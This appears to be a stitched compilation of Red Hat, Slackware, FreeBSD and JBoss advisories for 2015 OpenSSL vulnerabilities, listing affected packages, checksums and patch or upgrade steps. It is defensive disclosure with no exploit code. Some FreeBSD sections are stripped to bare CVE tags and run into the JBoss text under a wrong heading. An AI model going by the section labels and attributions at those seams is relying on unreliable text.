vulnerability was found in the way OpenSSL parsed PKCS#7 and\nCMS data. A remote attacker could use this flaw to cause an application\nthat parses PKCS#7 or CMS data from untrusted sources to use an excessive\namount of memory and possibly crash. (CVE-2015-3195)\n\nA race condition flaw, leading to a double free, was found in the way\nOpenSSL handled pre-shared key (PSK) identify hints. A remote attacker\ncould use this flaw to crash a multi-threaded SSL/TLS client using\nOpenSSL. (CVE-2015-3196)\n\nAll openssl users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library must be restarted, or\nthe system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-static-1.0.1e-42.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\naarch64:\nopenssl-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.aarch64.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.aarch64.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-3194\nhttps://access.redhat.com/security/cve/CVE-2015-3195\nhttps://access.redhat.com/security/cve/CVE-2015-3196\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://openssl.org/news/secadv/20151203.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWblodXlSAg2UNWIIRAt6yAKCw1yHbcUPDEPeokS22dMKyo6YFsQCgmPe4\ndpIS/iR9oiOKMXJY5t447ME=\n=qvLr\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. \n Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794). \n For more information, see:\n https://openssl.org/news/secadv_20151203.txt\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1794\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3193\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1q-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1q-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1q-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2e-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2e-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2e-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2e-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n5e45a22283b41aaf4f867918746ebc1d openssl-0.9.8zh-i486-1_slack13.0.txz\n0ad74b36ce143d28e15dfcfcf1fcb483 openssl-solibs-0.9.8zh-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nc360d323a2bed57c62d6699b2d4be65e openssl-0.9.8zh-x86_64-1_slack13.0.txz\n122240badbfbe51c842a9102d3cfe30f openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n1bf98b27573b20a7de5f6359f3eadbd7 openssl-0.9.8zh-i486-1_slack13.1.txz\n2b732f1f29de1cb6078fd1ddda8eb9ec openssl-solibs-0.9.8zh-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n735c3bbc55902ec57e46370cde32ea4b openssl-0.9.8zh-x86_64-1_slack13.1.txz\n483f506f3b86572e60fe4c46a67c226b openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n9af41ba336c64b92d5bbd86c17a93e94 openssl-0.9.8zh-i486-1_slack13.37.txz\nb83170b9c5ec56b4e2dc882b3c64b306 openssl-solibs-0.9.8zh-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n2220ff161d0bf3635d2dea7caae6e5e7 openssl-0.9.8zh-x86_64-1_slack13.37.txz\n17b3e8884f383e3327d5e4a6080634cb openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nced42bc3799f2b54aeb3b631a2864b90 openssl-1.0.1q-i486-1_slack14.0.txz\n52965f98ee30e8f3d22bde6b0fe7f53b openssl-solibs-1.0.1q-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ncbf49f09bdcebc61cf7fcb2857dc3a71 openssl-1.0.1q-x86_64-1_slack14.0.txz\n156911f58b71ee6369467d8fec34a59f openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n36d5f60b634788d4315ffb46ef6d4d88 openssl-1.0.1q-i486-1_slack14.1.txz\nfc18f566a9a2f5c6adb15d288245403a openssl-solibs-1.0.1q-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n03f1832417a79f73b35180a39ae4fb16 openssl-1.0.1q-x86_64-1_slack14.1.txz\nbf447792f23deb14e1fe3f008a6b78a7 openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n27b2974199a970392ed2192bf4a207a9 a/openssl-solibs-1.0.2e-i586-1.txz\n940a7653a6cadb44ce143d3b0e0eaa16 n/openssl-1.0.2e-i586-1.txz\n\nSlackware x86_64 -current packages:\n8636a45f49d186d505b356b9be66309b a/openssl-solibs-1.0.2e-x86_64-1.txz\n87c33a76a94993864a52bfe4e5d5b2f0 n/openssl-1.0.2e-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1q-i486-1_slack14.1.txz openssl-solibs-1.0.1q-i486-1_slack14.1.txz \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \nCorrected: 2015-12-03 21:18:48 UTC (stable/10, 10.2-STABLE)\n 2015-12-05 09:53:58 UTC (releng/10.2, 10.2-RELEASE-p8)\n 2015-12-05 09:53:58 UTC (releng/10.1, 10.1-RELEASE-p25)\n 2015-12-03 21:24:40 UTC (stable/9, 9.3-STABLE)\n 2015-12-05 09:53:58 UTC (releng/9.3, 9.3-RELEASE-p31)\nCVE Name: CVE-2015-3194, CVE-2015-3195, CVE-2015-3196\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII. [CVE-2015-3196]\n\nIII. [CVE-2015-3194] This affects FreeBSD 10.x only. [CVE-2015-3196]. This affects FreeBSD 10.1 only. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nReboot is optional but recommended. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nReboot is optional but recommended. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-9.3.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.1.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.1.patch.asc\n# gpg --verify openssl-10.1.patch.asc\n\n[FreeBSD 10.2]\n# fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.2.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:26/openssl-10.2.patch.asc\n# gpg --verify openssl-10.2.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/9/ r291722\nreleng/9.3/ r291854\nstable/10/ r291721\nreleng/10.1/ r291854\nreleng/10.2/ r291854\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2012-1148)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106,\nCVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nand CVE-2016-2842. Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Bugs fixed (https://bugzilla.redhat.com/):\n\n801648 - CVE-2012-1148 expat: Memory leak in poolGrow\n1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service\n1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import\n1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp()\n1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression\n1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS\n1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code\n1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation\n1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode\n1330101 - CVE-2016-2109 